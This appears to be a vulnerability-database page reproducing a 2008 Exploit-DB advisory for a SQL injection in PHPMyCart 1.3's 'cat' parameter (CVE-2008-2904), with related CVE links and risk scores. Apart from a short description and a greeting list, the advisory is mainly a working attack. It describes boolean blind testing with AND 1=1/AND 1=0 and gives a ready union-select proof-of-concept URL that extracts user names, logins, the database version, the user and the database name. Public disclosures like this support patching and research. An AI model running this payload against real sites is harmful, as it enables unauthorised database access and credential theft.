Lucene search
+L

PHPMyCart 1.3 - 'cat' SQL Injection

🗓️ 14 Jun 2008 00:00:00Reported by anonymousType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 55 Views

PHPMyCart 1.3 'cat' SQL Injection vulnerability by h0yt3r. Unverified category id variable in SQL queries allows attackers to retrieve sensitive information from the database without triggering SQL errors

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-2904
14 Jun 200800:00
circl
cve
CVE
CVE-2008-2904
30 Jun 200818:00
cve
cvelist
Cvelist
CVE-2008-2904
30 Jun 200818:00
cvelist
euvd
EUVD
EUVD-2008-2897
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-2904
30 Jun 200818:24
nvd
prion
Prion
Sql injection
30 Jun 200818:24
prion
######################
#
#PHPMyCart Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
##
###
##
#
#Script suffers from a not correctly verified category id variable which is used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#We dont get any SQL Errors when the Injection Query appear to be false.
#However we have to look for content changing when we inject.
#Look at AND 1=1/AND 1=0
#All rows are echoed on the left side.
#
#SQL Injection:
#http://[target]/[path]/shop.php?cat=[SQL]
#
#PoC:
#shop.php?cat=2%20and%201=0%20union%20select%201,concat(name,0x3a,login,0x3a,@@VERSION,0x3a,user(),0x3a,database())%20from%20user
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################

# milw0rm.com [2008-06-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00973
55